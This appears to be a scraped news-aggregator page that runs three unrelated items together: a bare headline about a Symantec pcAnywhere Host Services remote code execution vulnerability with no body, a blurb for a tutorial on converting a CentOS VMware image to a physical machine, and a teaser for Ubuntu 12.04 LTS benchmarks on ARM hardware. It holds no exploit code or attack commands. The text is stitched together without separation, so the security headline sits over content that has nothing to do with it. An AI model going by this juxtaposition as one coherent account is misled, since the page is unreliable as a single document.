Symantec pcAnywhere Host Services Remote Code Execution Vulnerability

Converting A VMware Image To A Physical Machine

This tutorial shows how to convert an existing CentOS VM to a
Physical machine. This tutorial covers the cloning of the VM to an
unpartitioned HDD and troubleshoot some of the possible errors that you
may have booting the OS on your new hardware. To illustrate this
procedure I will use VMware Workstation 7 as the handler to transfer the
VM installation to a physical HDD.

As shared on Phoronix in many articles already, Canonical has big plans for Ubuntu in the ARM-space. They are looking forward to making Ubuntu Linux be the first operating system to support the forthcoming ARM Cortex A15, but before that and the other achievements they have planned, they must first ship Ubuntu 12.04 LTS. With Ubuntu 12.04 there is already some exciting improvements on the ARM front, including ARM hard-float support, better OMAP4 support, and other packaging improvements. In this article are some early benchmarks of Ubuntu 12.04 LTS “Precise Pangolin” from the PandaBoard ES. For some workloads, Ubuntu 12.04 is remarkably faster than Ubuntu 11.10.